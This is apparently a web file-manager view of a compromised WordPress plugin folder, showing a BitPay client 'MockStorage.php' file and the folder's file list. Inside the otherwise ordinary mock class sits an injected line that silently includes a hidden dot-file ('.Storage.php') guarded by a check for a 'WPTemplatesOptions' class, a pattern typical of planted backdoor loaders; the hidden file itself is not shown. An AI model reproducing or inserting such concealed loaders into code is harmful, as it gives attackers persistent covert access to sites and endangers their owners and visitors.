PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
mycred
/
addons
/
buy-creds
/
gateways
/
Bitpay
/
Storage
<?php /** * @license Copyright 2011-2014 BitPay Inc., MIT License * see https://github.com/bitpay/php-bitpay-client/blob/master/LICENSE */ namespace Bitpay\Storage; /** * @codeCoverageIgnore * @package Bitcore */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class MockStorage implements StorageInterface { public function persist(\Bitpay\KeyInterface $key) { } public function load($id) { return; } }
[+]
..
[-] .Storage.php
[edit]
[-] FilesystemStorage.php
[edit]
[-] StorageInterface.php
[edit]
[-] EncryptedFilesystemStorage.php
[edit]
[-] MockStorage.php
[edit]